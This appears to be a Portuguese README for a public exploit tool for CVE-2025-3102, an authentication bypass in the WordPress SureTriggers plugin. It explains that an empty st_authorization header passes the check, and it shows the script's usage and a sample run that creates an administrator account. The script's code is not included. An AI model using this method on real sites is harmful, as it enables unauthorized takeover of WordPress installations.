
Wordpress SureTriggers <= 1.0.78 - Bypass de Autorização devido à Falta de Verificação de Valor Vazio para Criação de Usuário Administrativo Não Autenticado
🚨 CVE-2025-3102 é uma vulnerabilidade crítica de bypass de autenticação que afeta o plugin WordPress SureTriggers: All-in-One Automation Platform, instalado ativamente em mais de 100.000 sites. Devido à natureza da falha e à escala de implantação, esta vulnerabilidade representa um risco de segurança significativo.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HO plugin SureTriggers para WordPress é vulnerável a um bypass de autenticação que permite que atacantes não autenticados criem contas de administrador. Isso se deve a uma verificação de valor vazio ausente no secret_key dentro da função autheticate_user.
Quando o plugin está instalado e ativado, mas não configurado com uma chave de API, atacantes podem contornar a autenticação enviando um cabeçalho st_authorization vazio, acionando ações reservadas para usuários autenticados.
Um script Python é fornecido para automatizar a exploração desta vulnerabilidade.
Este script permite gerar um novo usuário administrador em sites vulneráveis.
readme.txtst_authorization vaziousage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Este script é fornecido apenas para fins educacionais.
O uso não autorizado deste código contra alvos sem permissão explícita é ilegal.
O autor não se responsabiliza por qualquer uso indevido ou danos causados.
Por: Nxploited ( Khaled Alenazi )